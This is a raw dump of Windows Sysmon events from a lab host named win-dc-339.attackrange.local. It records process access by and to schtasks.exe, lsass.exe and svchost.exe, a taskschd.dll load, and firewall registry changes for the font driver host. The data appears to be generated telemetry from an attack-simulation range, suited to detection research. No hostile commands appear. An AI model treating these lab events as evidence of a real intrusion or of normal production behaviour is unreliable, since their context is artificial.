Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-C20C-00000000BB01}6524C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.296{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.280{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.280{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.280{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.264{A7A01FEF-EBDA-607E-C30C-00000000BB01}55685704C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-C20C-00000000BB01}6524C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.264{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.249{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.249{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C30C-00000000BB01}5568C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.249{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.249{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C20C-00000000BB01}6524C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923308C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-C20C-00000000BB01}6524C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+39526d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+395170|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a7fcf|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+43494a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434c14|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+47afbb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.233{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.233{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.217{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.217{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.217{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000074625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:57:30.217{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor2021-04-20 14:57:30.217 10341000x800000000000000074624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.202{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.202{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-BF0C-00000000BB01}6592C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.202{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-BF0C-00000000BB01}6592C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.202{A7A01FEF-EBDA-607E-BF0C-00000000BB01}6592C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.202{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.202{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-BF0C-00000000BB01}6592C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.186{A7A01FEF-EBDA-607E-C10C-00000000BB01}65002348C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-BF0C-00000000BB01}6592C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.186{A7A01FEF-C0A3-607E-6C05-00000000BB01}36242592C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C00C-00000000BB01}4976C:\Windows\system32\fontdrvhost.exe0x13ffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.186{A7A01FEF-C0A3-607E-6D05-00000000BB01}34681948C:\Windows\system32\winlogon.exe{A7A01FEF-EBDA-607E-C00C-00000000BB01}4976C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+60dea|C:\Windows\system32\winlogon.exe+3508a|C:\Windows\system32\winlogon.exe+1bbfd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.171{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C10C-00000000BB01}6500C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.171{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-BF0C-00000000BB01}6592C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.171{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923308C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-BF0C-00000000BB01}6592C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+395149|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a7fcf|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+43494a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434c14|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+47afbb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000074612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:30.171{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523S-1-5-18v2.26|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|LUOwn=S-1-5-18|M=microsoft.windows.fontdrvhost|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host| 13241300x800000000000000074611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:30.171{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000647) 13241300x800000000000000074610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:30.171{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{BE6646F9-3D58-46B1-9472-98A7302CA83E}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host|LUOwn=S-1-5-18|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|EmbedCtxt=Usermode Font Driver Host| 13241300x800000000000000074609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:30.171{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000646) 13241300x800000000000000074608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:30.171{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{5F3F8741-2E73-4CDF-B19B-E0691AB7AFA8}v2.26|Action=Block|Active=TRUE|Dir=In|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host|LUOwn=S-1-5-18|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|EmbedCtxt=Usermode Font Driver Host| 10341000x800000000000000074607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.155{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-BD0C-00000000BB01}3784C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 